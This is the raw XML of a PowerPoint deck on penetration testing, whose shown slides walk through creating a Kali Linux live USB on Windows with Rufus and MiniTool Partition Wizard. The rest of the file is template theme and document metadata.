                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://docs.kali.org/downloading/kali-linux-live-usb-persistence</a:t>
            </a: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</p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13848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Tools required to do this with the least effort on Windows:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>Rufus (Image tool that can write the Kali Linux image to the flash drive)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>MiniTool Partition Wizard (Portable partitioning tool)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</p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18069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Rufus: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39503"/>
            <a:ext cx="2631652" cy="37186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8" y="1491630"/>
            <a:ext cx="316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1. Choose your flash drive.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211960" y="1660907"/>
            <a:ext cx="432048" cy="729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2066" y="1847282"/>
            <a:ext cx="316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2. Ensure Partition scheme is set.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4211960" y="2016559"/>
            <a:ext cx="440106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4008" y="2185836"/>
            <a:ext cx="316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3. Ensure Fat32 is set.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4211960" y="2355113"/>
            <a:ext cx="432048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4008" y="3512919"/>
            <a:ext cx="316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4. Choose the Kali Linux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" sz="1600" dirty="0" err="1"/>
              <a:t>iso</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" sz="1600" dirty="0"/>
              <a:t>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4139952" y="3682196"/>
            <a:ext cx="504056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4008" y="4381944"/>
            <a:ext cx="316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5. Click Start.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563888" y="4551221"/>
            <a:ext cx="1116124" cy="1606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6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  <p:bldP spid="17" grpId="0"/>
      <p:bldP spid="21" grpId="0"/>
    </p:bldLst>
  </p:timing>
</p:sld>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="EOH Standard PPT_SIMPLE">
  <a:themeElements>
    <a:clrScheme name="EOH New Corporate">
      <a:dk1>
        <a:srgbClr val="2F2F2F"/>
      </a:dk1>
      <a:lt1>
        <a:sysClr val="window" lastClr="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="002664"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="787C82"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="C41230"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="3D5466"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="517790"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="9CBBCC"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="787C82"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="CDC2B4"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="C41230"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="6577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6423E8582EA4087193E69259D73B9" ma:contentTypeVersion="1" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="824b596c196a5f762b01f770c86a860e">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="3c3e2dc5-974e-48cc-9a69-9b9ebf9f7ffb" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="0fe88d9489948d68453d8925019bfa4a" ns2:_="">
    <xsd:import namespace="3c3e2dc5-974e-48cc-9a69-9b9ebf9f7ffb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e2dc5-974e-48cc-9a69-9b9ebf9f7ffb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internalName="Catego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3c3e2dc5-974e-48cc-9a69-9b9ebf9f7ffb">Presentations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C00CFA-8673-4D6E-B697-423BD89869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3e2dc5-974e-48cc-9a69-9b9ebf9f7f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546618-A357-4088-8D90-95DCF01C5EBE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3c3e2dc5-974e-48cc-9a69-9b9ebf9f7ffb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1CFF968-63F1-4E45-A098-CAE7946A7A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EOH Powerpoint 16-9 Template_April 2015</Template>
  <TotalTime>843</TotalTime>
  <Words>1539</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>270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EOH Standard PPT_SIMPLE</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Penetration Testing</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation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EOH PowerPoint Template</dc:title>
  <dc:creator>Nicholas Leck</dc:creator>
  <cp:lastModifiedBy>Home</cp:lastModifiedBy>
  <cp:revision>187</cp:revision>
  <cp:lastPrinted>2015-03-10T13:28:08Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-08-11T13:14:05Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-11-18T08:51:34Z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0x0101000646423E8582EA4087193E69259D73B9</vt:lpwstr>
  </property>
</Properties>
</file>